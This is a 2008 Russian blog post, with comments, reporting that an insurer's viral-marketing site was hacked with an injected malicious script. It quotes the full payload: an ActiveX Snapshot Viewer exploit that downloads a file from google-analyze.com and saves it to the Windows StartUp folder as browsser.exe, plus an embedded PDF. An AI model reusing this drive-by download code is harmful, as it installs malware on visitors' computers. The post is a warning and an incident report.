Вирус от маркетологов или настоящий вирус?

Не успели мы пообщаться с adme.ru по поводу политики взаимоцитирования в рамках этого материала, как история с вирусным маркетингом Альфы получила неожиданное развитие. Долгая и продолжительная история отношений с маком отучила меня воспринимать вирусы как то, что может угрожать компьютеру и его безопасности, поэтому я проигнорировал предупреждение Safari о том, что сайт alfastrah.ru может содержать вредоносное ПО.

Сегодня вечером от знакомых из Лаборатории Касперского узнал, что на сайте есть кусок кода, который и превращает рекламный вирус в компьютерный. Оказывается осторожничать с этой ссылкой нужно было не только из-за звука флешки. Не вдаваясь в технические подробности - приведу пару скриншотов и комментарии от специалистов.

Анализ сайта показал, что, помимо эротического мультика, там сидит и вирус. Интересен способ внедрения: он вставлен аккуратно в центр страницы. Грузит вот что (скрипт даже не зашифрован): http://google-analyze.com/counter/index.php.

HTTP/1.1 200 OK
Date: Tue, 25 Nov 2008 15:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 475
Connection: close
Content-Type: text/html
<object classid=”clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9″ id=”attack”></object>
<script>
var arbitrary_file = “http://google-analyze.com/tracker/load.php”;
var destination = ‘c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsser.exe’;
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot(arbitrary_file,destination);
</script>
<embed src=”pdf.php” type=”application/pdf” width=100 height=100></embed>

У вируса есть особенность – блокировка загрузки при повторном посещении – вирус попадает на комп только при первой загрузке с какого-нибудь айпишника, при повторных уже нет. Так что если смотрят из конторы, где ходят через прокси – пострадает только первый посмотревший.
Для внедрения на сайт была использована незакрытая уязвимость.

Я полагаю, что аналитики из Касперского уже уведомили IT-департамент Альфы, что нужно лучше работать над безопасностью своих сайтов, однако на всякий случай напишу еще и маркетологам из Альфа-страхования. Однако интересная получается вещь - дырой воспользовались именно тогда, когда пошел рост заходов на сайт по экспоненте. Вот так иногда связаны рекламные и компьютерные вирусы ))

P.S. Пока что не дошли руки до подробного обзора, можно посмотреть ряд роликов про Блондинку-СИСадминку, в которых продвигается антивирус. Уж очень в тему для этой записи.

This entry was posted on Вторник, ноября 25, 2008 at 10:23 пп and is filed under вирус, все. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

5 комментариев на «Вирус от маркетологов или настоящий вирус?»

  1. Илья:

    А не надо пользоваться IE!
    Сколько раз твердили миру.

  2. ukrjobman:

    Автор, отлично. Только не скатитесь к Давыдову и не пихайте где только можно рекламу.

  3. Dofollow | Бизнес в интернете:

    [...] запустил свой вирус. Рекламный или настоящий - вот вопрос. При нажатии [...]

  4. Евгений:

    Очень интересен результат общения с adme о взаимоцитировании…

  5. Михаил:

    Результат весьма позитивен - /?p=190#comment-651

Вы должны зарегистрированы на сайте, чтобы писать комментарии.

Or use your OpenID: